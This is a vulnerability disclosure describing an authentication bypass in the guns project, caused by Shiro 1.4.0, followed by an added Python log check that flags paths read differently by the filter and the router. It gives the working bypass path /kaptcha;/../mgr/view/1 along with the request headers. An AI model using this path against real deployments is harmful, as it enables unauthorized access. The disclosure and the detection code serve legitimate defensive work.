Description
[Suggested description]
guns was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.
[Vulnerability Type]
Incorrect access control
[Vendor of Product]
https://github.com/qiguliuxing/guns
[Affected Product Code Base]
All versions (<= V2.5)
[Affected Component]
APIs that require authentication
[Attack Type]
Remote
[Vulnerability details]
A request sent directly to the API /mgr/view/1, as shown below,
is redirected to the login page because the endpoint requires authentication.
GET /mgr/view/1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Connection: keep-alive
Cookie: shiroCookie=74236b0c-d42d-44eb-8e04-4a94db77e003
Referer: http://127.0.0.1:8081/mgr/view/1
However, sending the payload below to the API /kaptcha;/../mgr/view/1
bypasses the authentication.
[Cause of vulnerability]
guns uses Shiro for authentication, but the Shiro version in use, 1.4.0, contains an insecure implementation.
In addition, guns configures some APIs without permission requirements, which allows the flaw in Shiro's implementation to be exploited to bypass authentication.
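
A log check a defender could run for this issue, added here as an example and not code from guns or Shiro: it flags requests whose path means one thing to the authentication filter and another to the routing layer. The two interpretations (truncating at the first ';' versus dropping ';' parameters and resolving '..') are an assumed model of the behaviour described above, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the original report).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /mgr/view/1 HTTP/1.1" 302 0',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /kaptcha HTTP/1.1" 200 1843',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /login;jsessionid=A1B2 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /kaptcha;/../mgr/view/1 HTTP/1.1" 200 2210',
]
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')


def _normalize(path: str) -> str:
    # Collapse repeated slashes, then resolve '.' and '..' segments.
    return posixpath.normpath(re.sub(r"/+", "/", "/" + path))


def filter_view(raw_path: str) -> str:
    """Assumed auth-filter view: everything from the first ';' on is dropped."""
    path = unquote(raw_path.split("?", 1)[0])
    return _normalize(path.split(";", 1)[0])


def dispatcher_view(raw_path: str) -> str:
    """Assumed routing view: ';param' removed per segment, then dot-segments resolved."""
    path = unquote(raw_path.split("?", 1)[0])
    return _normalize("/".join(seg.split(";", 1)[0] for seg in path.split("/")))


def find_mismatches(lines):
    """Return (raw_path, filter_view, dispatcher_view, status) where the views differ."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        raw_path, status = match.group(1), int(match.group(2))
        seen, routed = filter_view(raw_path), dispatcher_view(raw_path)
        if seen != routed:
            hits.append((raw_path, seen, routed, status))
    return hits


if __name__ == "__main__":
    for raw_path, seen, routed, status in find_mismatches(SAMPLE_LOG):
        print(f"{status} {raw_path}: filter sees {seen}, handler is {routed}")
```

A trailing session parameter such as ;jsessionid yields the same path in both views and is not flagged, so the check isolates requests where a ';' changes which endpoint is reached.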